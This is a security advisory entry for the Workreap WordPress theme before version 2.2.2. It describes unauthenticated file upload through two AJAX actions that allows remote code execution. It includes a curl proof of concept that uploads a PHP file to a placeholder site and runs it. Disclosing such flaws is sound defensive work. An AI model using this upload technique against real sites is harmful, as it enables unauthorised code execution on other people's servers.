Themes Vulnerabilities
Workreap < 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution
Description
The theme's AJAX actions `workreap_award_temp_file_uploader` and `workreap_temp_file_uploader` did not perform nonce checks, or validate that the request is from a valid user in any other way. The endpoints allowed for uploading arbitrary files to the uploads/workreap-temp directory. Uploaded files were neither sanitized nor validated, allowing an unauthenticated visitor to upload executable code such as php scripts.
Proof of Concept
% curl -F 'action=workreap_award_temp_file_uploader' -F [email protected] 'http://example.com/wp-admin/admin-ajax.php' {"type":"success","message":"File uploaded!","thumbnail":"http:\/\/example.com\/wp-content\/uploads\/workreap-temp\/malicious.php","name":"malicious.php","size":"24.00 B"} % curl 'http://example.com/wp-content/uploads/workreap-temp/malicious.php' PWNED!
Affects Themes
Fixed in version 2.2.2
References
Classification
Type
UPLOAD
CWE
Miscellaneous
Original Researcher
Harald Eilertsen (Jetpack)
Submitter
Harald Eilertsen (Jetpack)
Verified
Yes
Timeline
Publicly Published
2021-07-02 (about 1 years ago)
Added
2021-07-10 (about 1 years ago)
Last Updated
2022-04-12 (about 11 months ago)